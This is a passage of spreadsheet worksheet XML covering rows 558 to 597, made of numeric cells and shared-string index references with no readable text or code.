      <c r="N558" s="11" t="s">
        <v>1260</v>
      </c>
    </row>
    <row r="559" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A559" s="3">
        <v>558</v>
      </c>
      <c r="B559" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C559" s="14" t="s">
        <v>1261</v>
      </c>
      <c r="D559" s="6">
        <v>1</v>
      </c>
      <c r="E559" s="6">
        <v>503</v>
      </c>
      <c r="F559" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G559" s="6">
        <v>502</v>
      </c>
      <c r="H559" s="6">
        <v>447</v>
      </c>
      <c r="I559" s="6">
        <v>0</v>
      </c>
      <c r="J559" s="6">
        <v>399</v>
      </c>
      <c r="K559" s="6">
        <v>35</v>
      </c>
      <c r="L559" s="11"/>
      <c r="M559" s="11"/>
      <c r="N559" s="11" t="s">
        <v>1262</v>
      </c>
    </row>
    <row r="560" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A560" s="3">
        <v>559</v>
      </c>
      <c r="B560" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C560" s="14" t="s">
        <v>1263</v>
      </c>
      <c r="D560" s="6">
        <v>1</v>
      </c>
      <c r="E560" s="6">
        <v>503</v>
      </c>
      <c r="F560" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G560" s="6">
        <v>448</v>
      </c>
      <c r="H560" s="6">
        <v>450</v>
      </c>
      <c r="I560" s="6">
        <v>0</v>
      </c>
      <c r="J560" s="6">
        <v>399</v>
      </c>
      <c r="K560" s="6">
        <v>35</v>
      </c>
      <c r="L560" s="11"/>
      <c r="M560" s="11"/>
      <c r="N560" s="11" t="s">
        <v>1264</v>
      </c>
    </row>
    <row r="561" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A561" s="3">
        <v>560</v>
      </c>
      <c r="B561" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C561" s="14" t="s">
        <v>1265</v>
      </c>
      <c r="D561" s="6">
        <v>1</v>
      </c>
      <c r="E561" s="6">
        <v>503</v>
      </c>
      <c r="F561" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G561" s="6">
        <v>416</v>
      </c>
      <c r="H561" s="6">
        <v>453</v>
      </c>
      <c r="I561" s="6">
        <v>0</v>
      </c>
      <c r="J561" s="6">
        <v>399</v>
      </c>
      <c r="K561" s="6">
        <v>35</v>
      </c>
      <c r="L561" s="11"/>
      <c r="M561" s="11"/>
      <c r="N561" s="11" t="s">
        <v>1266</v>
      </c>
    </row>
    <row r="562" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A562" s="3">
        <v>561</v>
      </c>
      <c r="B562" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C562" s="14" t="s">
        <v>1267</v>
      </c>
      <c r="D562" s="6">
        <v>1</v>
      </c>
      <c r="E562" s="6">
        <v>503</v>
      </c>
      <c r="F562" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G562" s="6">
        <v>410</v>
      </c>
      <c r="H562" s="6">
        <v>456</v>
      </c>
      <c r="I562" s="6">
        <v>0</v>
      </c>
      <c r="J562" s="6">
        <v>399</v>
      </c>
      <c r="K562" s="6">
        <v>35</v>
      </c>
      <c r="L562" s="11"/>
      <c r="M562" s="11"/>
      <c r="N562" s="11" t="s">
        <v>1268</v>
      </c>
    </row>
    <row r="563" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A563" s="3">
        <v>562</v>
      </c>
      <c r="B563" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C563" s="14" t="s">
        <v>1270</v>
      </c>
      <c r="D563" s="6">
        <v>1</v>
      </c>
      <c r="E563" s="6">
        <v>503</v>
      </c>
      <c r="F563" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G563" s="6">
        <v>416</v>
      </c>
      <c r="H563" s="6">
        <v>459</v>
      </c>
      <c r="I563" s="6">
        <v>0</v>
      </c>
      <c r="J563" s="6">
        <v>399</v>
      </c>
      <c r="K563" s="6">
        <v>35</v>
      </c>
      <c r="L563" s="11"/>
      <c r="M563" s="11"/>
      <c r="N563" s="11" t="s">
        <v>1271</v>
      </c>
    </row>
    <row r="564" spans="1:14" ht="17" x14ac:dyDescent="0.2">
      <c r="A564" s="3">
        <v>563</v>
      </c>
      <c r="B564" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C564" s="14" t="s">
        <v>1272</v>
      </c>
      <c r="D564" s="6">
        <v>1</v>
      </c>
      <c r="E564" s="6">
        <v>503</v>
      </c>
      <c r="F564" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G564" s="6">
        <v>421</v>
      </c>
      <c r="H564" s="6">
        <v>378</v>
      </c>
      <c r="I564" s="6">
        <v>0</v>
      </c>
      <c r="J564" s="6">
        <v>399</v>
      </c>
      <c r="K564" s="6">
        <v>35</v>
      </c>
      <c r="L564" s="11"/>
      <c r="M564" s="11"/>
      <c r="N564" s="11" t="s">
        <v>1273</v>
      </c>
    </row>
    <row r="565" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A565" s="3">
        <v>564</v>
      </c>
      <c r="B565" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C565" s="14" t="s">
        <v>1274</v>
      </c>
      <c r="D565" s="6">
        <v>1</v>
      </c>
      <c r="E565" s="6">
        <v>503</v>
      </c>
      <c r="F565" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G565" s="6">
        <v>438</v>
      </c>
      <c r="H565" s="6">
        <v>380</v>
      </c>
      <c r="I565" s="6">
        <v>0</v>
      </c>
      <c r="J565" s="6">
        <v>399</v>
      </c>
      <c r="K565" s="6">
        <v>35</v>
      </c>
      <c r="L565" s="11"/>
      <c r="M565" s="11"/>
      <c r="N565" s="11" t="s">
        <v>1275</v>
      </c>
    </row>
    <row r="566" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A566" s="3">
        <v>565</v>
      </c>
      <c r="B566" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C566" s="14" t="s">
        <v>1276</v>
      </c>
      <c r="D566" s="6">
        <v>1</v>
      </c>
      <c r="E566" s="6">
        <v>503</v>
      </c>
      <c r="F566" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G566" s="6">
        <v>452</v>
      </c>
      <c r="H566" s="6">
        <v>382</v>
      </c>
      <c r="I566" s="6">
        <v>0</v>
      </c>
      <c r="J566" s="6">
        <v>399</v>
      </c>
      <c r="K566" s="6">
        <v>35</v>
      </c>
      <c r="L566" s="11"/>
      <c r="M566" s="11"/>
      <c r="N566" s="11" t="s">
        <v>1277</v>
      </c>
    </row>
    <row r="567" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A567" s="3">
        <v>566</v>
      </c>
      <c r="B567" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C567" s="14" t="s">
        <v>1278</v>
      </c>
      <c r="D567" s="6">
        <v>1</v>
      </c>
      <c r="E567" s="6">
        <v>503</v>
      </c>
      <c r="F567" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G567" s="6">
        <v>469</v>
      </c>
      <c r="H567" s="6">
        <v>384</v>
      </c>
      <c r="I567" s="6">
        <v>0</v>
      </c>
      <c r="J567" s="6">
        <v>399</v>
      </c>
      <c r="K567" s="6">
        <v>35</v>
      </c>
      <c r="L567" s="11"/>
      <c r="M567" s="11"/>
      <c r="N567" s="11" t="s">
        <v>1279</v>
      </c>
    </row>
    <row r="568" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A568" s="3">
        <v>567</v>
      </c>
      <c r="B568" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C568" s="14" t="s">
        <v>1280</v>
      </c>
      <c r="D568" s="6">
        <v>1</v>
      </c>
      <c r="E568" s="6">
        <v>503</v>
      </c>
      <c r="F568" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G568" s="6">
        <v>451</v>
      </c>
      <c r="H568" s="6">
        <v>386</v>
      </c>
      <c r="I568" s="6">
        <v>0</v>
      </c>
      <c r="J568" s="6">
        <v>399</v>
      </c>
      <c r="K568" s="6">
        <v>35</v>
      </c>
      <c r="L568" s="11"/>
      <c r="M568" s="11"/>
      <c r="N568" s="11" t="s">
        <v>1281</v>
      </c>
    </row>
    <row r="569" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A569" s="3">
        <v>568</v>
      </c>
      <c r="B569" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C569" s="14" t="s">
        <v>1282</v>
      </c>
      <c r="D569" s="6">
        <v>1</v>
      </c>
      <c r="E569" s="6">
        <v>503</v>
      </c>
      <c r="F569" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G569" s="6">
        <v>444</v>
      </c>
      <c r="H569" s="6">
        <v>388</v>
      </c>
      <c r="I569" s="6">
        <v>0</v>
      </c>
      <c r="J569" s="6">
        <v>399</v>
      </c>
      <c r="K569" s="6">
        <v>35</v>
      </c>
      <c r="L569" s="11"/>
      <c r="M569" s="11"/>
      <c r="N569" s="11" t="s">
        <v>1283</v>
      </c>
    </row>
    <row r="570" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A570" s="3">
        <v>569</v>
      </c>
      <c r="B570" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C570" s="14" t="s">
        <v>1284</v>
      </c>
      <c r="D570" s="6">
        <v>1</v>
      </c>
      <c r="E570" s="6">
        <v>503</v>
      </c>
      <c r="F570" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G570" s="6">
        <v>443</v>
      </c>
      <c r="H570" s="6">
        <v>390</v>
      </c>
      <c r="I570" s="6">
        <v>0</v>
      </c>
      <c r="J570" s="6">
        <v>399</v>
      </c>
      <c r="K570" s="6">
        <v>35</v>
      </c>
      <c r="L570" s="11"/>
      <c r="M570" s="11"/>
      <c r="N570" s="11" t="s">
        <v>1285</v>
      </c>
    </row>
    <row r="571" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A571" s="3">
        <v>570</v>
      </c>
      <c r="B571" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C571" s="14" t="s">
        <v>1286</v>
      </c>
      <c r="D571" s="6">
        <v>1</v>
      </c>
      <c r="E571" s="6">
        <v>503</v>
      </c>
      <c r="F571" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G571" s="6">
        <v>430</v>
      </c>
      <c r="H571" s="6">
        <v>392</v>
      </c>
      <c r="I571" s="6">
        <v>0</v>
      </c>
      <c r="J571" s="6">
        <v>399</v>
      </c>
      <c r="K571" s="6">
        <v>35</v>
      </c>
      <c r="L571" s="11"/>
      <c r="M571" s="11"/>
      <c r="N571" s="11" t="s">
        <v>1287</v>
      </c>
    </row>
    <row r="572" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A572" s="3">
        <v>571</v>
      </c>
      <c r="B572" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C572" s="14" t="s">
        <v>1288</v>
      </c>
      <c r="D572" s="6">
        <v>1</v>
      </c>
      <c r="E572" s="6">
        <v>503</v>
      </c>
      <c r="F572" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G572" s="6">
        <v>422</v>
      </c>
      <c r="H572" s="6">
        <v>394</v>
      </c>
      <c r="I572" s="6">
        <v>0</v>
      </c>
      <c r="J572" s="6">
        <v>399</v>
      </c>
      <c r="K572" s="6">
        <v>35</v>
      </c>
      <c r="L572" s="11"/>
      <c r="M572" s="11"/>
      <c r="N572" s="11" t="s">
        <v>1289</v>
      </c>
    </row>
    <row r="573" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A573" s="3">
        <v>572</v>
      </c>
      <c r="B573" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C573" s="14" t="s">
        <v>1290</v>
      </c>
      <c r="D573" s="6">
        <v>1</v>
      </c>
      <c r="E573" s="6">
        <v>503</v>
      </c>
      <c r="F573" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G573" s="6">
        <v>430</v>
      </c>
      <c r="H573" s="6">
        <v>397</v>
      </c>
      <c r="I573" s="6">
        <v>0</v>
      </c>
      <c r="J573" s="6">
        <v>399</v>
      </c>
      <c r="K573" s="6">
        <v>35</v>
      </c>
      <c r="L573" s="11"/>
      <c r="M573" s="11"/>
      <c r="N573" s="11" t="s">
        <v>1291</v>
      </c>
    </row>
    <row r="574" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A574" s="3">
        <v>573</v>
      </c>
      <c r="B574" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C574" s="14" t="s">
        <v>1293</v>
      </c>
      <c r="D574" s="6">
        <v>1</v>
      </c>
      <c r="E574" s="6">
        <v>503</v>
      </c>
      <c r="F574" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G574" s="6">
        <v>444</v>
      </c>
      <c r="H574" s="6">
        <v>400</v>
      </c>
      <c r="I574" s="6">
        <v>0</v>
      </c>
      <c r="J574" s="6">
        <v>399</v>
      </c>
      <c r="K574" s="6">
        <v>35</v>
      </c>
      <c r="L574" s="11"/>
      <c r="M574" s="11"/>
      <c r="N574" s="11" t="s">
        <v>1294</v>
      </c>
    </row>
    <row r="575" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A575" s="3">
        <v>574</v>
      </c>
      <c r="B575" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C575" s="14" t="s">
        <v>1295</v>
      </c>
      <c r="D575" s="6">
        <v>1</v>
      </c>
      <c r="E575" s="6">
        <v>503</v>
      </c>
      <c r="F575" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G575" s="6">
        <v>448</v>
      </c>
      <c r="H575" s="6">
        <v>403</v>
      </c>
      <c r="I575" s="6">
        <v>0</v>
      </c>
      <c r="J575" s="6">
        <v>399</v>
      </c>
      <c r="K575" s="6">
        <v>35</v>
      </c>
      <c r="L575" s="11"/>
      <c r="M575" s="11"/>
      <c r="N575" s="11" t="s">
        <v>1296</v>
      </c>
    </row>
    <row r="576" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A576" s="3">
        <v>575</v>
      </c>
      <c r="B576" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C576" s="14" t="s">
        <v>1297</v>
      </c>
      <c r="D576" s="6">
        <v>1</v>
      </c>
      <c r="E576" s="6">
        <v>503</v>
      </c>
      <c r="F576" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G576" s="6">
        <v>452</v>
      </c>
      <c r="H576" s="6">
        <v>406</v>
      </c>
      <c r="I576" s="6">
        <v>0</v>
      </c>
      <c r="J576" s="6">
        <v>399</v>
      </c>
      <c r="K576" s="6">
        <v>35</v>
      </c>
      <c r="L576" s="11"/>
      <c r="M576" s="11"/>
      <c r="N576" s="11" t="s">
        <v>1298</v>
      </c>
    </row>
    <row r="577" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A577" s="3">
        <v>576</v>
      </c>
      <c r="B577" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C577" s="14" t="s">
        <v>1299</v>
      </c>
      <c r="D577" s="6">
        <v>1</v>
      </c>
      <c r="E577" s="6">
        <v>503</v>
      </c>
      <c r="F577" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G577" s="6">
        <v>454</v>
      </c>
      <c r="H577" s="6">
        <v>409</v>
      </c>
      <c r="I577" s="6">
        <v>0</v>
      </c>
      <c r="J577" s="6">
        <v>399</v>
      </c>
      <c r="K577" s="6">
        <v>35</v>
      </c>
      <c r="L577" s="11"/>
      <c r="M577" s="11"/>
      <c r="N577" s="11" t="s">
        <v>1300</v>
      </c>
    </row>
    <row r="578" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A578" s="3">
        <v>577</v>
      </c>
      <c r="B578" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C578" s="14" t="s">
        <v>1301</v>
      </c>
      <c r="D578" s="6">
        <v>1</v>
      </c>
      <c r="E578" s="6">
        <v>503</v>
      </c>
      <c r="F578" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G578" s="6">
        <v>452</v>
      </c>
      <c r="H578" s="6">
        <v>412</v>
      </c>
      <c r="I578" s="6">
        <v>0</v>
      </c>
      <c r="J578" s="6">
        <v>399</v>
      </c>
      <c r="K578" s="6">
        <v>35</v>
      </c>
      <c r="L578" s="11"/>
      <c r="M578" s="11"/>
      <c r="N578" s="11" t="s">
        <v>1302</v>
      </c>
    </row>
    <row r="579" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A579" s="3">
        <v>578</v>
      </c>
      <c r="B579" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C579" s="14" t="s">
        <v>1303</v>
      </c>
      <c r="D579" s="6">
        <v>1</v>
      </c>
      <c r="E579" s="6">
        <v>503</v>
      </c>
      <c r="F579" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G579" s="6">
        <v>445</v>
      </c>
      <c r="H579" s="6">
        <v>415</v>
      </c>
      <c r="I579" s="6">
        <v>0</v>
      </c>
      <c r="J579" s="6">
        <v>399</v>
      </c>
      <c r="K579" s="6">
        <v>35</v>
      </c>
      <c r="L579" s="11"/>
      <c r="M579" s="11"/>
      <c r="N579" s="11" t="s">
        <v>1304</v>
      </c>
    </row>
    <row r="580" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A580" s="3">
        <v>579</v>
      </c>
      <c r="B580" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C580" s="14" t="s">
        <v>1305</v>
      </c>
      <c r="D580" s="6">
        <v>1</v>
      </c>
      <c r="E580" s="6">
        <v>503</v>
      </c>
      <c r="F580" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G580" s="6">
        <v>422</v>
      </c>
      <c r="H580" s="6">
        <v>418</v>
      </c>
      <c r="I580" s="6">
        <v>0</v>
      </c>
      <c r="J580" s="6">
        <v>399</v>
      </c>
      <c r="K580" s="6">
        <v>35</v>
      </c>
      <c r="L580" s="11"/>
      <c r="M580" s="11"/>
      <c r="N580" s="11" t="s">
        <v>1306</v>
      </c>
    </row>
    <row r="581" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A581" s="3">
        <v>580</v>
      </c>
      <c r="B581" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C581" s="14" t="s">
        <v>1307</v>
      </c>
      <c r="D581" s="6">
        <v>1</v>
      </c>
      <c r="E581" s="6">
        <v>503</v>
      </c>
      <c r="F581" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G581" s="6">
        <v>428</v>
      </c>
      <c r="H581" s="6">
        <v>421</v>
      </c>
      <c r="I581" s="6">
        <v>0</v>
      </c>
      <c r="J581" s="6">
        <v>399</v>
      </c>
      <c r="K581" s="6">
        <v>35</v>
      </c>
      <c r="L581" s="11"/>
      <c r="M581" s="11"/>
      <c r="N581" s="11" t="s">
        <v>1308</v>
      </c>
    </row>
    <row r="582" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A582" s="3">
        <v>581</v>
      </c>
      <c r="B582" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C582" s="14" t="s">
        <v>1309</v>
      </c>
      <c r="D582" s="6">
        <v>1</v>
      </c>
      <c r="E582" s="6">
        <v>503</v>
      </c>
      <c r="F582" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G582" s="6">
        <v>419</v>
      </c>
      <c r="H582" s="6">
        <v>424</v>
      </c>
      <c r="I582" s="6">
        <v>0</v>
      </c>
      <c r="J582" s="6">
        <v>399</v>
      </c>
      <c r="K582" s="6">
        <v>35</v>
      </c>
      <c r="L582" s="11"/>
      <c r="M582" s="11"/>
      <c r="N582" s="11" t="s">
        <v>1310</v>
      </c>
    </row>
    <row r="583" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A583" s="3">
        <v>582</v>
      </c>
      <c r="B583" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C583" s="14" t="s">
        <v>1311</v>
      </c>
      <c r="D583" s="6">
        <v>1</v>
      </c>
      <c r="E583" s="6">
        <v>503</v>
      </c>
      <c r="F583" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G583" s="6">
        <v>539</v>
      </c>
      <c r="H583" s="6">
        <v>427</v>
      </c>
      <c r="I583" s="6">
        <v>0</v>
      </c>
      <c r="J583" s="6">
        <v>399</v>
      </c>
      <c r="K583" s="6">
        <v>35</v>
      </c>
      <c r="L583" s="11"/>
      <c r="M583" s="11"/>
      <c r="N583" s="11" t="s">
        <v>1312</v>
      </c>
    </row>
    <row r="584" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A584" s="3">
        <v>583</v>
      </c>
      <c r="B584" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C584" s="14" t="s">
        <v>1313</v>
      </c>
      <c r="D584" s="6">
        <v>1</v>
      </c>
      <c r="E584" s="6">
        <v>503</v>
      </c>
      <c r="F584" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G584" s="6">
        <v>580</v>
      </c>
      <c r="H584" s="6">
        <v>430</v>
      </c>
      <c r="I584" s="6">
        <v>0</v>
      </c>
      <c r="J584" s="6">
        <v>399</v>
      </c>
      <c r="K584" s="6">
        <v>35</v>
      </c>
      <c r="L584" s="11"/>
      <c r="M584" s="11"/>
      <c r="N584" s="11" t="s">
        <v>1314</v>
      </c>
    </row>
    <row r="585" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A585" s="3">
        <v>584</v>
      </c>
      <c r="B585" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C585" s="14" t="s">
        <v>1315</v>
      </c>
      <c r="D585" s="6">
        <v>1</v>
      </c>
      <c r="E585" s="6">
        <v>503</v>
      </c>
      <c r="F585" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G585" s="6">
        <v>605</v>
      </c>
      <c r="H585" s="6">
        <v>433</v>
      </c>
      <c r="I585" s="6">
        <v>0</v>
      </c>
      <c r="J585" s="6">
        <v>399</v>
      </c>
      <c r="K585" s="6">
        <v>35</v>
      </c>
      <c r="L585" s="11"/>
      <c r="M585" s="11"/>
      <c r="N585" s="11" t="s">
        <v>1316</v>
      </c>
    </row>
    <row r="586" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A586" s="3">
        <v>585</v>
      </c>
      <c r="B586" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C586" s="14" t="s">
        <v>1318</v>
      </c>
      <c r="D586" s="6">
        <v>1</v>
      </c>
      <c r="E586" s="6">
        <v>503</v>
      </c>
      <c r="F586" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G586" s="6">
        <v>596</v>
      </c>
      <c r="H586" s="6">
        <v>436</v>
      </c>
      <c r="I586" s="6">
        <v>0</v>
      </c>
      <c r="J586" s="6">
        <v>399</v>
      </c>
      <c r="K586" s="6">
        <v>35</v>
      </c>
      <c r="L586" s="11"/>
      <c r="M586" s="11"/>
      <c r="N586" s="11" t="s">
        <v>1319</v>
      </c>
    </row>
    <row r="587" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A587" s="3">
        <v>586</v>
      </c>
      <c r="B587" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C587" s="14" t="s">
        <v>1320</v>
      </c>
      <c r="D587" s="6">
        <v>1</v>
      </c>
      <c r="E587" s="6">
        <v>503</v>
      </c>
      <c r="F587" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G587" s="6">
        <v>605</v>
      </c>
      <c r="H587" s="6">
        <v>439</v>
      </c>
      <c r="I587" s="6">
        <v>0</v>
      </c>
      <c r="J587" s="6">
        <v>399</v>
      </c>
      <c r="K587" s="6">
        <v>35</v>
      </c>
      <c r="L587" s="11"/>
      <c r="M587" s="11"/>
      <c r="N587" s="11" t="s">
        <v>1321</v>
      </c>
    </row>
    <row r="588" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A588" s="3">
        <v>587</v>
      </c>
      <c r="B588" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C588" s="14" t="s">
        <v>1322</v>
      </c>
      <c r="D588" s="6">
        <v>1</v>
      </c>
      <c r="E588" s="6">
        <v>503</v>
      </c>
      <c r="F588" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G588" s="6">
        <v>474</v>
      </c>
      <c r="H588" s="6">
        <v>442</v>
      </c>
      <c r="I588" s="6">
        <v>0</v>
      </c>
      <c r="J588" s="6">
        <v>399</v>
      </c>
      <c r="K588" s="6">
        <v>35</v>
      </c>
      <c r="L588" s="11"/>
      <c r="M588" s="11"/>
      <c r="N588" s="11" t="s">
        <v>1323</v>
      </c>
    </row>
    <row r="589" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A589" s="3">
        <v>588</v>
      </c>
      <c r="B589" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C589" s="14" t="s">
        <v>1324</v>
      </c>
      <c r="D589" s="6">
        <v>1</v>
      </c>
      <c r="E589" s="6">
        <v>503</v>
      </c>
      <c r="F589" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G589" s="6">
        <v>415</v>
      </c>
      <c r="H589" s="6">
        <v>445</v>
      </c>
      <c r="I589" s="6">
        <v>0</v>
      </c>
      <c r="J589" s="6">
        <v>399</v>
      </c>
      <c r="K589" s="6">
        <v>35</v>
      </c>
      <c r="L589" s="11"/>
      <c r="M589" s="11"/>
      <c r="N589" s="11" t="s">
        <v>1325</v>
      </c>
    </row>
    <row r="590" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A590" s="3">
        <v>589</v>
      </c>
      <c r="B590" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C590" s="14" t="s">
        <v>1326</v>
      </c>
      <c r="D590" s="6">
        <v>1</v>
      </c>
      <c r="E590" s="6">
        <v>503</v>
      </c>
      <c r="F590" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G590" s="6">
        <v>404</v>
      </c>
      <c r="H590" s="6">
        <v>448</v>
      </c>
      <c r="I590" s="6">
        <v>0</v>
      </c>
      <c r="J590" s="6">
        <v>399</v>
      </c>
      <c r="K590" s="6">
        <v>35</v>
      </c>
      <c r="L590" s="11"/>
      <c r="M590" s="11"/>
      <c r="N590" s="11" t="s">
        <v>1327</v>
      </c>
    </row>
    <row r="591" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A591" s="3">
        <v>590</v>
      </c>
      <c r="B591" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C591" s="14" t="s">
        <v>1328</v>
      </c>
      <c r="D591" s="6">
        <v>1</v>
      </c>
      <c r="E591" s="6">
        <v>503</v>
      </c>
      <c r="F591" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G591" s="6">
        <v>405</v>
      </c>
      <c r="H591" s="6">
        <v>451</v>
      </c>
      <c r="I591" s="6">
        <v>0</v>
      </c>
      <c r="J591" s="6">
        <v>399</v>
      </c>
      <c r="K591" s="6">
        <v>35</v>
      </c>
      <c r="L591" s="11"/>
      <c r="M591" s="11"/>
      <c r="N591" s="11" t="s">
        <v>1329</v>
      </c>
    </row>
    <row r="592" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A592" s="3">
        <v>591</v>
      </c>
      <c r="B592" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C592" s="14" t="s">
        <v>1330</v>
      </c>
      <c r="D592" s="6">
        <v>1</v>
      </c>
      <c r="E592" s="6">
        <v>503</v>
      </c>
      <c r="F592" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G592" s="6">
        <v>403</v>
      </c>
      <c r="H592" s="6">
        <v>454</v>
      </c>
      <c r="I592" s="6">
        <v>0</v>
      </c>
      <c r="J592" s="6">
        <v>399</v>
      </c>
      <c r="K592" s="6">
        <v>35</v>
      </c>
      <c r="L592" s="11"/>
      <c r="M592" s="11"/>
      <c r="N592" s="11" t="s">
        <v>1331</v>
      </c>
    </row>
    <row r="593" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A593" s="3">
        <v>592</v>
      </c>
      <c r="B593" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C593" s="14" t="s">
        <v>1332</v>
      </c>
      <c r="D593" s="6">
        <v>1</v>
      </c>
      <c r="E593" s="6">
        <v>503</v>
      </c>
      <c r="F593" s="11" t="s">
        <v>53</v>
      </c>
      <c r="G593" s="6">
        <v>428</v>
      </c>
      <c r="H593" s="6">
        <v>457</v>
      </c>
      <c r="I593" s="6">
        <v>0</v>
      </c>
      <c r="J593" s="6">
        <v>399</v>
      </c>
      <c r="K593" s="6">
        <v>35</v>
      </c>
      <c r="L593" s="11"/>
      <c r="M593" s="11"/>
      <c r="N593" s="11" t="s">
        <v>1333</v>
      </c>
    </row>
    <row r="594" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A594" s="3">
        <v>595</v>
      </c>
      <c r="B594" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C594" s="14" t="s">
        <v>1339</v>
      </c>
      <c r="D594" s="6">
        <v>1</v>
      </c>
      <c r="E594" s="6">
        <v>404</v>
      </c>
      <c r="F594" s="11" t="s">
        <v>383</v>
      </c>
      <c r="G594" s="12" t="s">
        <v>446</v>
      </c>
      <c r="H594" s="6">
        <v>400</v>
      </c>
      <c r="I594" s="6">
        <v>0</v>
      </c>
      <c r="J594" s="6">
        <v>331</v>
      </c>
      <c r="K594" s="6">
        <v>69134</v>
      </c>
      <c r="L594" s="11"/>
      <c r="M594" s="11"/>
      <c r="N594" s="11" t="s">
        <v>1340</v>
      </c>
    </row>
    <row r="595" spans="1:14" ht="17" x14ac:dyDescent="0.2">
      <c r="A595" s="3">
        <v>597</v>
      </c>
      <c r="B595" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C595" s="14" t="s">
        <v>1343</v>
      </c>
